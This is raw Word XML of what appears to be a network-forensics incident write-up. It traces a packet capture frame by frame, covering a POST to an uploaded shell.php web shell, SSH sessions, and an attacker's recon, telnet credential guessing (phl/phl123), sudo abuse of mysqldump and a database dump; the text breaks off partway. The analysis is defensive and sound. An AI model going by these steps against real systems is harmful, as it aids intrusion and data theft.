          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>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Style w:val="664"/>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highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>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rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Frame 571</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">IP 136.243.111.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> got a 3-way handshake from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">the server IP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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP protocol using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /uploads  HTTP/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returned 301 Moved Permanently</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708"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Frame 738</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">IP 136.243.111.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> got a 3-way handshake from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">the server IP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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP protocol using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /uploads/  HTTP/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returned 200 OK</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708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Frame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">757-759 : An IP 92.255. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">85.135</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">33116 did a  3-way handshake with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:22. Port 22 indicating a ssh conection</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ind w:right="0" w:firstLine="708"/>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rPr>
        <w:t xml:space="preserve">Frame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">760 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">784: an SSH connection was established, server and client key exchange was initiated as well as encrypted packets</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ind w:right="0" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5943600" cy="3153177"/>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60001" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId111"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="31531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68.00pt;height:248.28pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId111"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708"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Frame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">788: An IP 138.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">68.92.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">163</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> did </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a successful 3-way handshake with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">34.22.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">31.221</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">nd on frame 789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">138.68.92.163:54950</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  initialized an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol with data length </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">589</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to IP 134.122.33.221:80 using POST /uploads/shell.php HTTP/1.1  (application/x-www-form-urlencoded)</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708"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">frame 790: shows acknowledgment for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">IP 134.122.33.221:80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5943600" cy="3675943"/>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4186" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId112"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="367594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68.00pt;height:289.44pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId11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eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">I did a tcp stream follow on frame 786</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highlight w:val="none"/>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2954838"/>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07710" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId113"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="29548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68.00pt;height:232.66pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId113"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775079"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5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6838" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId114"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="57750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68.00pt;height:454.73pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId114"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755634"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="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88545" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId115"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="57556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68.00pt;height:453.20pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId115"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eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">I did a TCP stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> follow up on the next stream</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eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>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161423"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5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1588" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId116"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943597" cy="31614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68.00pt;height:248.93pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId116" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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258"/>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Thie image shows a shell session where the attacker gains access to a web server as the user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</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58"/>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spawns a bash shell using Python and navigates to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/uploads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory.</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58"/>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lists the contents of the directory and finds a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is likely a web shell.</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59"/>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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Reconnaissance</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0"/>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checks the network interfaces using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and identifies two IP addresses: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">134.122.33.221</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (public IP) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (private IP).</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0"/>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attempts to scan the network using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> but fails due to lack of root privileges. They then perform a basic scan and discover two hosts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the web server) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (another host).</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1"/>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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation of the Database Server</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connects to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Telnet and attempts to log in using various credentials (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</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administrator</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phl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). They eventually succeed with the username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl123</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2"/>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Once logged in, the attacker checks the system information and network connections using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat</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3"/>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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation and Database Dump</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checks the sudo privileges of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user and finds that they can run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root without a password.</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accesses the MySQL database, lists the databases, and dumps the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> database to a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
